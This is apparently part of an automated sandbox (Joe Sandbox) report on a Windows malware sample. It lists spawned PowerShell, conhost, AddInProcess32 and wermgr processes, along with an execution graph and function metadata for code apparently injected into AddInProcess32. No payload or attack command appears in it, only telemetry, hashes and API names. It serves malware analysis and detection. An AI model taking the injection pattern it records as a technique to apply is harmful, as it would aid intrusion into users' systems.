          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:38
          Start time:12:40:04
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:39
          Start time:12:40:07
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xf40000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:40
          Start time:12:40:08
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2640" "2808" "2340" "0" "0" "2572" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:41
          Start time:12:40:30
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:42
          Start time:12:40:30
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:43
          Start time:12:40:33
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xd80000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:44
          Start time:12:40:33
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4392" "2800" "2312" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:45
          Start time:12:40:56
          Start date:29/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:false

          General

          Target ID:46
          Start time:12:40:56
          Start date:29/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:47
          Start time:12:40:59
          Start date:29/08/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0x170000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:false

          General

          Target ID:48
          Start time:12:41:02
          Start date:29/08/2024
          Path:C:\Windows\System32\wermgr.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6780" "2824" "2552" "2828" "0" "0" "2832" "0" "0" "0" "0" "0"
          Imagebase:0x7ff794bc0000
          File size:229'728 bytes
          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:9.8%
            Total number of Nodes:112
            Total number of Limit Nodes:13
            execution_graph 79179 db1ae7 79180 db1af6 79179->79180 79183 ddfc63 79180->79183 79186 dde183 79183->79186 79187 dde1a9 79186->79187 79196 db7603 79187->79196 79189 dde1bf 79195 db1b8d 79189->79195 79199 dcaf23 79189->79199 79191 dde1de 79192 dde1f3 79191->79192 79193 ddc8b3 ExitProcess 79191->79193 79210 ddc8b3 79192->79210 79193->79192 79198 db7610 79196->79198 79213 dc6253 79196->79213 79198->79189 79200 dcaf4f 79199->79200 79231 dcae13 79200->79231 79203 dcafb0 79203->79191 79204 dcaf7c 79206 dcaf87 79204->79206 79237 ddc4d3 79204->79237 79205 dcaf94 79205->79203 79207 ddc4d3 NtClose 79205->79207 79206->79191 79209 dcafa6 79207->79209 79209->79191 79211 ddc8cd 79210->79211 79212 ddc8de ExitProcess 79211->79212 79212->79195 79214 dc6270 79213->79214 79216 dc6289 79214->79216 79217 ddcf43 79214->79217 79216->79198 79219 ddcf5d 79217->79219 79218 ddcf8c 79218->79216 79219->79218 79224 ddbaf3 79219->79224 79222 dde5d3 RtlFreeHeap 79223 ddd005 79222->79223 79223->79216 79225 ddbb0d 79224->79225 79228 18e2c0a 79225->79228 79226 ddbb39 79226->79222 79229 18e2c1f LdrInitializeThunk 79228->79229 79230 18e2c11 79228->79230 79229->79226 79230->79226 79232 dcaf09 79231->79232 79233 dcae2d 79231->79233 79232->79204 79232->79205 79240 ddbb93 79233->79240 79236 ddc4d3 NtClose 79236->79232 79238 ddc4ed 79237->79238 79239 ddc4fe NtClose 79238->79239 79239->79206 79241 ddbbad 79240->79241 79244 18e35c0 LdrInitializeThunk 79241->79244 79242 dcaefd 79242->79236 79244->79242 79135 dd4bd3 79137 dd4bec 79135->79137 79136 dd4c34 79143 dde5d3 79136->79143 79137->79136 79140 dd4c74 79137->79140 79142 dd4c79 79137->79142 79141 dde5d3 RtlFreeHeap 79140->79141 79141->79142 79146 ddc863 79143->79146 79145 dd4c44 79147 ddc880 79146->79147 79148 ddc891 RtlFreeHeap 79147->79148 79148->79145 79154 ddb3f3 79155 ddb410 79154->79155 79156 ddb421 RtlDosPathNameToNtPathName_U 79155->79156 79157 ddf793 79158 ddf7a9 79157->79158 79159 ddf7a3 79157->79159 79162 dde6b3 79158->79162 79161 ddf7cf 79165 ddc813 79162->79165 79164 dde6ce 79164->79161 79166 ddc830 79165->79166 79167 ddc841 RtlAllocateHeap 79166->79167 79167->79164 79168 18e2b60 LdrInitializeThunk 79245 dd8ac3 79246 dd8b28 79245->79246 79247 dd8b5f 79246->79247 79250 dd4273 79246->79250 79249 dd8b41 79251 dd4290 79250->79251 79251->79249 79252 dd4371 79251->79252 79253 dd4418 79251->79253 79254 dd4403 79251->79254 79252->79249 79255 ddc4d3 NtClose 79253->79255 79256 ddc4d3 NtClose 79254->79256 79259 dd4421 79255->79259 79257 dd440c 79256->79257 79257->79249 79258 dd4458 79258->79249 79259->79258 79260 dde5d3 RtlFreeHeap 79259->79260 79261 dd444c 79260->79261 79261->79249 79262 ddbaa3 79263 ddbabd 79262->79263 79266 18e2df0 LdrInitializeThunk 79263->79266 79264 ddbae5 79266->79264 79169 dc7593 79171 dc75b7 79169->79171 79170 dc75be 79171->79170 79172 dc760a 79171->79172 79173 dc75f3 LdrLoadDll 79171->79173 79173->79172 79174 dc3a33 79177 dc3a53 79174->79177 79176 dc3ab2 79177->79176 79178 dcb233 RtlFreeHeap LdrInitializeThunk 79177->79178 79178->79176 79267 dce323 79268 dce349 79267->79268 79272 dce440 79268->79272 79273 ddf8c3 79268->79273 79270 dce3de 79271 ddbaf3 LdrInitializeThunk 79270->79271 79270->79272 79271->79272 79274 ddf833 79273->79274 79275 ddf890 79274->79275 79276 dde6b3 RtlAllocateHeap 79274->79276 79275->79270 79277 ddf86d 79276->79277 79278 dde5d3 RtlFreeHeap 79277->79278 79278->79275

            Executed Functions

            Function 00DC7593 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00DC7605
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 641713f23f048f1696d0ec618c022323b4541233fe64c13a101abcb43f724ead
            • Instruction ID: 22de7b4ab14d2c853095fed05644bd897c5f96274dc6d578b304c1b84688af3b
            • Opcode Fuzzy Hash: 641713f23f048f1696d0ec618c022323b4541233fe64c13a101abcb43f724ead
            • Instruction Fuzzy Hash: 07011EB5E4020EABDF10DBE4DC42FDEB778AB54304F1481A6E90997241F671EB548BB1
            Function 00DDC4D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 39 ddc4d3-ddc50c call db4913 call ddd743 NtClose
            APIs
            • NtClose.NTDLL(00DD48A4,?,00000000,?,?,00DD48A4,?,00009942), ref: 00DDC507
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 5a5853dc5eb2533962e80409a7bfb222f42410b76074107d9fb4f2a45c1a0d00
            • Instruction ID: cbec547fb40efd22acc737a2ef7b7fd16284e139f30808a2648bceafd50dd6bf
            • Opcode Fuzzy Hash: 5a5853dc5eb2533962e80409a7bfb222f42410b76074107d9fb4f2a45c1a0d00
            • Instruction Fuzzy Hash: 14E08C366102087BDA20FE5ADC42FDB776DEFC9750F104459FA19A7242C6B2BA1187F0
            Function 018E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 56 18e35c0-18e35cc LdrInitializeThunk
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
            • Instruction ID: 3a0f1ae34f5bf9daeda63350940c730a42cb9109f64e8e98303b49f71b373174
            • Opcode Fuzzy Hash: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
            • Instruction Fuzzy Hash: 2190023160550406D600715845147061005D7D2301F65C415A242C568DC795CB6966A3
            Function 018E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 53 18e2b60-18e2b6c LdrInitializeThunk
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
            • Instruction ID: a11856767b2824dd571eacd08378298d34a79faaf482879d3094d2b8d7d73807
            • Opcode Fuzzy Hash: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
            • Instruction Fuzzy Hash: 4590026120240007460571584414616400AD7E2301B55C025E301C590DC625CAA96226
            Function 018E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 55 18e2df0-18e2dfc LdrInitializeThunk
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
            • Instruction ID: bb7907eaa22fb6f2295811ee3f39f1b820d3c0cdbee36de34bc5c263746ad59f
            • Opcode Fuzzy Hash: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
            • Instruction Fuzzy Hash: 1F90023120140417D611715845047070009D7D2341F95C416A242C558DD756CB6AA222
            Function 018E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 54 18e2c70-18e2c7c LdrInitializeThunk
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
            • Instruction ID: 06929106df72ffc00045b8c06b942e422ab1033ee27a07defb8cd5258655930e
            • Opcode Fuzzy Hash: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
            • Instruction Fuzzy Hash: B190023120148806D6107158840474A0005D7D2301F59C415A642C658DC795CAA97222
            Function 00DB19EC Relevance: .1, Instructions: 147COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d7ecbdb21f00759b1146cbb0b82c1040e1a9a2fe230989b0251ae50e6555881
            • Instruction ID: 8e9e2d6cef16270240e5011a209b42522ae2387ee2cc0c52a8a32111eb2653a1
            • Opcode Fuzzy Hash: 8d7ecbdb21f00759b1146cbb0b82c1040e1a9a2fe230989b0251ae50e6555881
            • Instruction Fuzzy Hash: BD41CE7A9095C68FCB068A38CD715E53F92DB5B315B9C41D8D44BDF2A2E2112C168BF0
            Function 00DDB3F3 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00DDB436
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: Path$NameName_
            • String ID:
            • API String ID: 3514427675-0
            • Opcode ID: 0f217ed6cb0c888089a1d8f468c5c9ffcc3795eacc0d47b14c7a28044f9dbefc
            • Instruction ID: b2fe6f8ee8ff2e445ec92bbefd3c35ce3460520225f51fa983bac543a9aeb87c
            • Opcode Fuzzy Hash: 0f217ed6cb0c888089a1d8f468c5c9ffcc3795eacc0d47b14c7a28044f9dbefc
            • Instruction Fuzzy Hash: E6F030752006087BDA10EF59DC41EDB77ADEFC8710F104409FA19A7241C670B9108BB4
            Function 00DDC863 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 34 ddc863-ddc8a7 call db4913 call ddd743 RtlFreeHeap
            APIs
            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B50B60F,00000007,00000000,00000004,00000000,00DC6E1C,000000F4), ref: 00DDC8A2
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: ddc1289bcf99a21d0d977e6e29658a10cbf03dc3d2099e2914b366c9d4cec394
            • Instruction ID: 7e9dad334a1cd0f7d8d63cade574f756172b62813740183b1500e34876578e0f
            • Opcode Fuzzy Hash: ddc1289bcf99a21d0d977e6e29658a10cbf03dc3d2099e2914b366c9d4cec394
            • Instruction Fuzzy Hash: 58E09275200208BBDA14EE58DC41FDB37ACEFC8710F004419F919A7242C770BA118BB5
            Function 00DDC813 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 29 ddc813-ddc857 call db4913 call ddd743 RtlAllocateHeap
            APIs
            • RtlAllocateHeap.NTDLL(00000104,?,00DD48AF,?,?,00DD48AF,?,00000104,?,00009942), ref: 00DDC852
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 03d7c1762a05c5ec4be6be5e5f48bab544a0d84ced6ee577ce33450546f03a7b
            • Instruction ID: a1e2b2a5f64f3292e6df8a559e4b0cb6902e519015523ce168e1a11ceb08592c
            • Opcode Fuzzy Hash: 03d7c1762a05c5ec4be6be5e5f48bab544a0d84ced6ee577ce33450546f03a7b
            • Instruction Fuzzy Hash: 13E09275214208BFDA14EE58DC41FDB33ACEFC8710F004409F909A7242D670BD108BB4
            Function 00DDC8B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 44 ddc8b3-ddc8ec call db4913 call ddd743 ExitProcess
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_db0000_AddInProcess32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 5e59635aedbd3039af35b03e3c12eb95344eec2f6e060c1fb1050ace445b233e
            • Instruction ID: 202f9d9b6e828337361a7b0d17fba72238c913dfc2ad1e0bb86706c03a9e14a7
            • Opcode Fuzzy Hash: 5e59635aedbd3039af35b03e3c12eb95344eec2f6e060c1fb1050ace445b233e
            • Instruction Fuzzy Hash: 24E0E6352506187BD620EA59DC41FEB77ADDFC5710F004455FA0967242C672BA1187F4
            Function 018E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 49 18e2c0a-18e2c0f 50 18e2c1f-18e2c26 LdrInitializeThunk 49->50 51 18e2c11-18e2c18 49->51
            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
            • Instruction ID: bb474d082fac1af3b01111541aa8a44a2111d560bf077d08218a15e28203e4da
            • Opcode Fuzzy Hash: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
            • Instruction Fuzzy Hash: 7BB09B719015C5C9DF11E764460C7177955B7D2701F15C065D3038641F4738C2E5E276

            Non-executed Functions

            Function 01922349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
            • API String ID: 0-2160512332
            • Opcode ID: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
            • Instruction ID: 7fecbcaa5c0afcc5eebf04bcdd180f7b8981febc4467ac0902c7768c748e0536
            • Opcode Fuzzy Hash: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
            • Instruction Fuzzy Hash: 9D92BF71608352AFE721DF28C880F6BB7E8BB88710F14492DFA98D7255D774E944CB92
            Function 018968B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
            • API String ID: 0-3089669407
            • Opcode ID: 04c568cfb2a9942f099186742aa57de557f1275ee71649835c37011f89ab5473
            • Instruction ID: ec11269d16e4c7dff5ec810d5772776025a715253f1265c0d0fe71d03b2fc6de
            • Opcode Fuzzy Hash: 04c568cfb2a9942f099186742aa57de557f1275ee71649835c37011f89ab5473
            • Instruction Fuzzy Hash: 078120B2D06219AF9B21EAECDDC4EEF77BDAB147547154426FA00F7110E620EF058BA1
            Function 018D0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
            • API String ID: 0-360209818
            • Opcode ID: 95c0cdd7cc1b8af35dc76b5d51c0678186550e859c3215baa53f2be5150e27fe
            • Instruction ID: 894e6517c53ece547434f50478b31a8774b6f4591c9e137945036fe54d8e03c5
            • Opcode Fuzzy Hash: 95c0cdd7cc1b8af35dc76b5d51c0678186550e859c3215baa53f2be5150e27fe
            • Instruction Fuzzy Hash: 0762A0B1E002299FDB24DF28C8447A9B7B6BF95310F5482EAD64DAB284D7325ED1CF41
            Function 019512ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
            • API String ID: 0-3591852110
            • Opcode ID: c52692aac9526a91098d512715709e92d8d4c2e715fab86c43df78c4d1793652
            • Instruction ID: 06d3241ef9333aa5de7432aef805fd75eeb4f769a916070141db0e01c6835774
            • Opcode Fuzzy Hash: c52692aac9526a91098d512715709e92d8d4c2e715fab86c43df78c4d1793652
            • Instruction Fuzzy Hash: 7812DF30600642DFDB65CF29C480BB6BBF5FF09715F188869E98AEB642D734E981CB51
            Function 018BAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
            • API String ID: 0-3197712848
            • Opcode ID: d0d5d13d5f6739f65793df6b9cfb2a575609f3ea67b0556096878eef6abc677a
            • Instruction ID: 271781de290e593350f954a4a8d1b3daea082e15f27a8d43ddcb8a59f99035fa
            • Opcode Fuzzy Hash: d0d5d13d5f6739f65793df6b9cfb2a575609f3ea67b0556096878eef6abc677a
            • Instruction Fuzzy Hash: 0012AE71A083569FD325DF28C480BEAB7E5BF84B18F040919F989DB391E734DA45CB52
            Function 0189D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
            • API String ID: 0-3532704233
            • Opcode ID: 92fbade081273f426eef54a51f7c899e19cad3c592b29a3c1f823afcd0b82ace
            • Instruction ID: e33d3d5d7d4113da19824fe4b73bde3dddd807e4dc9763ccce6743fb3dcab485
            • Opcode Fuzzy Hash: 92fbade081273f426eef54a51f7c899e19cad3c592b29a3c1f823afcd0b82ace
            • Instruction Fuzzy Hash: 20B1B0715083459FCB16DF68C880A6BBBE8BF84754F094A2EFA99D7200D770DA04CB96
            Function 01950CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2429039304.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_1870000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
            • API String ID: 0-1357697941
            • Opcode ID: c1f29a72ccf08d8f79781afd5367ebfaa5d6430904485e2cc99f2f9763143790
